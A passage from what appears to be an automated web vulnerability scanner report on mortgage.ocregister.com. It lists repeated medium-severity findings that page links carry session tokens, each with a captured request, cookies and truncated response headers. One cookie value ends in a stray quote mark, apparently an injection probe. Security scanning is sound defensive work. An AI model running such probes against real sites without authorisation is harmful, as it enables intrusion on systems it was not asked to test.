GET /2009/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.54. http://mortgage.ocregister.com/2009/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.55. http://mortgage.ocregister.com/2009/12/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.56. http://mortgage.ocregister.com/2010/01/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.57. http://mortgage.ocregister.com/2010/02/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.58. http://mortgage.ocregister.com/2010/03/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.59. http://mortgage.ocregister.com/2010/04/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.60. http://mortgage.ocregister.com/2010/05/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.61. http://mortgage.ocregister.com/2010/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.62. http://mortgage.ocregister.com/2010/07/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.63. http://mortgage.ocregister.com/2010/08/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.64. http://mortgage.ocregister.com/2010/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.65. http://mortgage.ocregister.com/2010/10/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.66. http://mortgage.ocregister.com/2010/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.67. http://mortgage.ocregister.com/2010/12/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.68. http://mortgage.ocregister.com/2011/01/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.69. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:23 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.70. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:08 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.71. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:02 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80335

